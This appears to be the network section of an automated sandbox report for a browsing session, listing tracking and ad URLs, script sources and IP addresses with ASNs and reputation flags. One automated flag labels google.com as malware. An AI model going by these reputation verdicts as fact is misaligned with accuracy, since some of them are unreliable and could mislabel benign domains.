                                                                                                                                                                                                                                                                                                https://track.hubspot.com/__ptq.gif?k=17&fi=f054981c-21de-4ec6-8c5a-6dd37a6f0a15&fci=a869e27a-a4fb-4e28-b720-50ae827c4e48&ft=0&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=471034161&v=1.1&a=6834707&pi=44965294738&ct=landing-page&ccu=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&cpi=44965294738&lpi=44965294738&abi=44965294735&lvi=44965294738&lvc=en&r=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&pu=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&t=Cloud+App+Security+Checklist+%7C+Google+%26+Microsoft+365+Security&cts=1728903368160&vi=1ad7ee3b723d214336417ad5b634063c&nc=false&u=82022089.1ad7ee3b723d214336417ad5b634063c.1728897174105.1728897174105.1728897174105.1&b=82022089.2.1728897174106&pt=1&cc=15false
                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                  https://d.adroll.com/cm/n/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&advertisable=TSSSGOL6MBFETCAHMJBJCQfalse
                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                    https://a.nel.cloudflare.com/report/v4?s=ZJHPpfUM%2BIP6sYUEcgRvSgPNB3BLhOnNhSksiyRwByBbjmGdDFDs%2FaeYepX3NL4vjpIaOO1%2Fmd9sGcgkRIovD7xt6homgXsQzcxgZgSs82s75qgATJSmJ8uAJLjrQ1rUtChXKVc2IRI%3Dfalse
                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                      https://pixel.onaudience.com/?partner=137085098&mapped=1040172889715587758A2B28B3F6BBD2false
                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                        https://match.adsrvr.org/track/cmb/generic?ttd_pid=xksw9la&ttd_tpi=1&gdpr=0false
                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                          https://match.adsrvr.org/track/cmf/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=e3913225-94b4-4b08-9fd3-4285fd980084%252C%252C&gdpr=0&gdpr_consent=false
                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                            https://d.adroll.com/cm/taboola/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&advertisable=TSSSGOL6MBFETCAHMJBJCQfalse
                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                              https://fundingchoicesmessages.google.com/f/AGSKWxX0-0x5HivWeZLchiQ-nD7g2ILscryuZP_ALv6f3ICLAOJ-avY8-qKfwAdUk5OjIfQJNpUfSt6dcMucORzNFPmm-eBr07hAP4N-Gd6Dh2lmgPI8mzM7UY1l8KzcVJqhr_oszQslaA==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzI4ODk3MTYxLDQ0OTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNiw5XSxudWxsLDIsbnVsbCwiZW4iLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCwxXSwiaHR0cHM6Ly9hbGQubXkuaWQvIixudWxsLFtbOCwidGFCZ0d2UlFDMjAiXSxbOSwiZW4tVVMiXSxbMTgsIltbWzBdXV0iXSxbMTksIjIiXSxbMTcsIlswXSJdXV0false
                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                https://d.adroll.com/cm/r/out?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=55268102626.38289&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist&advertisable=TSSSGOL6MBFETCAHMJBJCQfalse
                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                  https://www.youtube.com/s/player/2f238d39/www-player.cssfalse
                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                    https://d.adroll.com/pixel/TSSSGOL6MBFETCAHMJBJCQ/I63T2M6SPVC5ROYHA7HR6W?adroll_fpc=378484b1f0e790975382e6fc128c23d2-1728897186400&flg=1&pv=63965975650.284035&arrfrr=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&cookie=&adroll_s_ref=https%3A//googleads.g.doubleclick.net/&keyw=&p0=20119&xa4=1false
                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                      https://get.managedmethods.com/cloud-application-security-checklist?hsLang=enfalse
                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                        https://cdn.rawgit.com/igniel/blogger/master/iglo/v2.jsfalse
                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                          https://js.hscollectedforms.net/collectedforms.jsfalse
                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                            https://forms-na1.hsforms.com/embed/v3/counters.gif?key=forms-embed-v2-DEFINITION_SUCCESS&count=1false
                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                              https://ups.analytics.yahoo.com/ups/55980/sync?_origin=1&uid=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&gdpr=0&gdpr_consent=BOOla_OOOla_OA2ABBENAkwAAAAXyACAAyAIIA&verify=truefalse
                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                https://googleads.g.doubleclick.net/aclk?nis=6&sa=l&ai=CzpLmhOAMZ46MNdLp78EPn-jPyQnboZvOeo-Yz9CQE6yFu4fTOBABIKuv2JABYMkGoAGlxfPnA8gBAagDAcgDywSqBPkBT9Cep1guQNdWpPsrmNwBIZ2KcXe07fxUOlQoQaI0RONvZdfXKhZbO6f9rnrbOMDO2JUpIadxb9srUNd2EBCTqAdj3bLPaSgZ3jIVIzl7UU-IOFO-V5Pq9ASgMq0BtJZFMZtnquXJX1jNN5ovREKhjebK0Q2wP9xqO6BvKPIxFbDLSB9rwzaBdV3TiycQPFc9dN1KSBU7y9IVonucXuTQenZiUDUbEqL70-SjNPPllWiqjrLsIa4giBKMUBVgzttceF9DcNJAXT_EQ1EZbIvirUt_FiXB9fGyTNYWfJtjlL6HRgqlSaMByE5YNVwbSfjxlbjWsjlGZrBIwAT4h4n_hwWIBYO-m49RoAYugAfDuowYqAfVyRuoB9m2sQKoB6a-G6gHjs4bqAeT2BuoB_DgG6gH7paxAqgH_p6xAqgHr76xAqgHmgaoB_PRG6gHltgbqAeqm7ECqAeDrbECqAfgvbECqAf_nrECqAffn7ECqAfKqbECqAfrpbECqAfqsbECqAeZtbECqAe-t7ECqAf4wrECqAf7wrEC2AcB0ggmCIBhEAEYHzICigI6C4BAgMCAgICgqIACSL39wTpY2JCM58ONiQOxCVEO7X6GkChngAoBmAsByAsB2gwRCgsQ0Oewx6S6g5iDARICAQOqDQJVU8gNAdgTCtAVAZgWAfgWAYAXAbIXAhgBuhcCOAGyGAkSAqRmGC4iAQDQGAE&ae=1&ase=2&gclid=EAIaIQobChMIjt6N58ONiQMV0vQ7Ah0f9DOZEAEYASAAEgKBIvD_BwE&num=1&cid=CAQSTwDpaXnfhIVrKubni22jrvJ193s0SUtKenR05Ckkb7AzizqZ1SmYpmZnI8rh5H_O6MTsFcTZgu04yoCtRSVKUMBwl229eFS4BBBIVgak2CYYAQ&sig=AOD64_3gZVqtoSijFnTKmu_DnIf-3Ae7vw&client=ca-pub-2542884292174911&rf=1&nb=8&act=1&ri=1&adurl=https://get.managedmethods.com/k12-cybersecurity-safety-k12dive%3Fgad_source%3D5false
                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                  https://hy.markkasmick.click/imp/70341?param_3=nortb_over_ttl&nrbfalse
                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                    https://cdn.jsdelivr.net/gh/igniel/blogger@master/iglo/v2.jsfalse
                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                      https://get.managedmethods.com/hs/hsstatic/HubspotToolsMenu/static-1.354/js/index.jsfalse
                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                        https://connect.facebook.net/signals/config/283945248938426?v=2.9.170&r=stable&domain=get.managedmethods.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112false
                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                          https://api.hubapi.com/hs-script-loader-public/v1/config/pixels-and-events/json?portalId=6834707false
                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                                                                                                            https://stats.g.doubleclick.net/g/collectchromecache_210.2.dr, chromecache_204.2.drfalse
                                                                                                                                                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                            https://www.blogger.comchromecache_332.2.drfalseunknown
                                                                                                                                                                                                                                                                                                                                            https://ep2.adtrafficquality.googlechromecache_407.2.drfalse
                                                                                                                                                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                            https://ampcid.google.com/v1/publisher:getClientIdchromecache_294.2.dr, chromecache_418.2.drfalse
                                                                                                                                                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                            https://s.adroll.comchromecache_305.2.drfalse
                                                                                                                                                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                            https://fundingchoicesmessages.google.com/i/$chromecache_351.2.dr, chromecache_236.2.drfalse
                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                              http://ns.attribution.com/ads/1.0/chromecache_342.2.drfalse
                                                                                                                                                                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                              https://stats.g.doubleclick.net/j/collectchromecache_418.2.drfalse
                                                                                                                                                                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                              https://cdn.ampproject.org/amp4ads-host-v0.jschromecache_351.2.dr, chromecache_236.2.drfalse
                                                                                                                                                                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                              https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs851kLAtmjago3pCo-CFHHSnaB4wOH25VmQ1wnAschromecache_332.2.drfalse
                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                https://ep1.adtrafficquality.google/pagead/gen_204?id=sodar2&v=232chromecache_196.2.dr, chromecache_407.2.drfalse
                                                                                                                                                                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                https://my7recovery.blogspot.com/feeds/posts/default?alt=rsschromecache_332.2.drfalse
                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                  https://securepubads.g.doubleclick.net/pagead/js/cocar.jschromecache_351.2.dr, chromecache_236.2.drfalse
                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                    http://mathiasbynens.be/chromecache_351.2.dr, chromecache_236.2.drfalse
                                                                                                                                                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                    https://pd.sharethis.com/pd/dtscout?_t_=px&url=chromecache_323.2.dr, chromecache_388.2.drfalse
                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                      https://connect.facebook.net/chromecache_398.2.dr, chromecache_276.2.drfalse
                                                                                                                                                                                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                      https://www.google.com/adsense/search/async-ads.jschromecache_351.2.dr, chromecache_236.2.drfalse
                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                        http://googleads.g.doubleclick.netchromecache_351.2.dr, chromecache_236.2.drfalse
                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                          https://www.blogger.com/static/v1/widgets/3650705295-widgets.jschromecache_332.2.drfalse
                                                                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                                                                            https://ep2.adtrafficquality.google/sodar/$chromecache_351.2.dr, chromecache_236.2.drfalse
                                                                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                                                                              https://www.google.com/pagead/1p-user-list/927141988/?randomchromecache_207.2.dr, chromecache_409.2.dr, chromecache_317.2.dr, chromecache_346.2.dr, chromecache_245.2.dr, chromecache_253.2.dr, chromecache_242.2.dr, chromecache_298.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                                                http://www.hubspot.comchromecache_223.2.dr, chromecache_198.2.dr, chromecache_345.2.dr, chromecache_203.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                  http://google.comchromecache_351.2.dr, chromecache_236.2.drtrue
                                                                                                                                                                                                                                                                                                                                                                  • URL Reputation: malware
                                                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                                                  https://www.blogger.com/static/v1/jsbin/297329198-lbx.jschromecache_332.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                                    http://daneden.me/animatechromecache_366.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                                                    https://www.blogger.com/feeds/920271029688449427/posts/defaultchromecache_332.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                                                      https://www.blogger.com/static/v1/v-css/13464135-lightbox_bundle.csschromecache_332.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                                                                                        https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV2mufCwic-NGC9wpgCnQ_tNbFA-l8rrqbieFyIxcchromecache_332.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                                          http://kenwheeler.github.io/slickchromecache_264.2.dr, chromecache_258.2.drfalse
                                                                                                                                                                                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                                                          13.33.187.19
                                                                                                                                                                                                                                                                                                                                                                          script.hotjar.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          142.250.185.100
                                                                                                                                                                                                                                                                                                                                                                          www.google.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          108.128.74.13
                                                                                                                                                                                                                                                                                                                                                                          adserver-vpc-alb-2-1264451658.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          104.16.118.116
                                                                                                                                                                                                                                                                                                                                                                          forms.hubspot.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.16.78.142
                                                                                                                                                                                                                                                                                                                                                                          js.usemessages.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.16.107.254
                                                                                                                                                                                                                                                                                                                                                                          forms.hscollectedforms.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          34.251.125.38
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          35.190.80.1
                                                                                                                                                                                                                                                                                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          65.9.66.97
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          198.47.127.205
                                                                                                                                                                                                                                                                                                                                                                          pug-ams-bc.pubmnet.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                                                                                                                                                                          37.252.171.52
                                                                                                                                                                                                                                                                                                                                                                          unknownEuropean Union
                                                                                                                                                                                                                                                                                                                                                                          29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                                                                                                          65.9.66.104
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          148.113.153.94
                                                                                                                                                                                                                                                                                                                                                                          pixel.onaudience.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          396982GOOGLE-PRIVATE-CLOUDUSfalse
                                                                                                                                                                                                                                                                                                                                                                          142.250.185.110
                                                                                                                                                                                                                                                                                                                                                                          www3.l.google.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          107.178.254.65
                                                                                                                                                                                                                                                                                                                                                                          pippio.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          142.250.185.193
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          198.252.106.147
                                                                                                                                                                                                                                                                                                                                                                          ald.my.idCanada
                                                                                                                                                                                                                                                                                                                                                                          20068HAWKHOSTCAfalse
                                                                                                                                                                                                                                                                                                                                                                          169.150.236.104
                                                                                                                                                                                                                                                                                                                                                                          rawgitcdn.b-cdn.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          2711SPIRITTEL-ASUSfalse
                                                                                                                                                                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                                                                                                                                                                          unknownReserved
                                                                                                                                                                                                                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                                                                                                                                                                                                                          142.250.185.194
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          142.250.186.142
                                                                                                                                                                                                                                                                                                                                                                          analytics.google.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.17.175.91
                                                                                                                                                                                                                                                                                                                                                                          static.hsappstatic.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          35.244.174.68
                                                                                                                                                                                                                                                                                                                                                                          idsync.rlcdn.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          216.58.212.162
                                                                                                                                                                                                                                                                                                                                                                          adservice.google.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.18.139.17
                                                                                                                                                                                                                                                                                                                                                                          js.hsleadflows.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          216.58.206.34
                                                                                                                                                                                                                                                                                                                                                                          cm.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          216.58.206.33
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          18.66.102.106
                                                                                                                                                                                                                                                                                                                                                                          static-cdn.hotjar.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                                                                                                          99.80.69.237
                                                                                                                                                                                                                                                                                                                                                                          wsky-live.live.eks.hotjar.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          64.202.112.159
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          22075AS-OUTBRAINUSfalse
                                                                                                                                                                                                                                                                                                                                                                          142.250.185.161
                                                                                                                                                                                                                                                                                                                                                                          googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          172.64.147.16
                                                                                                                                                                                                                                                                                                                                                                          js.hs-banner.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          141.226.228.48
                                                                                                                                                                                                                                                                                                                                                                          am-vip001.taboola.comIsrael
                                                                                                                                                                                                                                                                                                                                                                          200478TABOOLA-ASILfalse
                                                                                                                                                                                                                                                                                                                                                                          104.16.111.254
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.18.244.108
                                                                                                                                                                                                                                                                                                                                                                          api.hubapi.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          157.240.252.35
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                                                                                                                                          18.245.86.47
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          52.202.213.18
                                                                                                                                                                                                                                                                                                                                                                          adserver-2084671375.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                          18.195.70.100
                                                                                                                                                                                                                                                                                                                                                                          httplogserver-lb.global.unified-prod.sharethis.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          104.17.24.14
                                                                                                                                                                                                                                                                                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          34.107.203.234
                                                                                                                                                                                                                                                                                                                                                                          settings.luckyorange.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          172.217.16.129
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          192.229.133.221
                                                                                                                                                                                                                                                                                                                                                                          cs837.wac.edgecastcdn.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          15133EDGECASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                          151.101.1.140
                                                                                                                                                                                                                                                                                                                                                                          reddit.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                          142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.16.109.254
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          142.250.181.228
                                                                                                                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.18.41.124
                                                                                                                                                                                                                                                                                                                                                                          2500081.fs1.hubspotusercontent-na1.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          dualstack.reddit.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.16.117.116
                                                                                                                                                                                                                                                                                                                                                                          app.hubspot.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          104.17.223.152
                                                                                                                                                                                                                                                                                                                                                                          js.hsadspixel.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                          54.171.225.199
                                                                                                                                                                                                                                                                                                                                                                          pacman-content-live.live.eks.hotjar.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          64.202.112.63
                                                                                                                                                                                                                                                                                                                                                                          nydc1.outbrain.orgUnited States
                                                                                                                                                                                                                                                                                                                                                                          22075AS-OUTBRAINUSfalse
                                                                                                                                                                                                                                                                                                                                                                          142.250.185.97
                                                                                                                                                                                                                                                                                                                                                                          blogspot.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          108.177.15.155
                                                                                                                                                                                                                                                                                                                                                                          stats.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                                                          52.59.151.85
                                                                                                                                                                                                                                                                                                                                                                          thirdparty-logserver-lb.global.unified-prod.sharethis.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          18.245.86.116
                                                                                                                                                                                                                                                                                                                                                                          d1qug1xf2dk5z6.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                          199.60.103.30
                                                                                                                                                                                                                                                                                                                                                                          group7.sites.hscoscdn00.netCanada
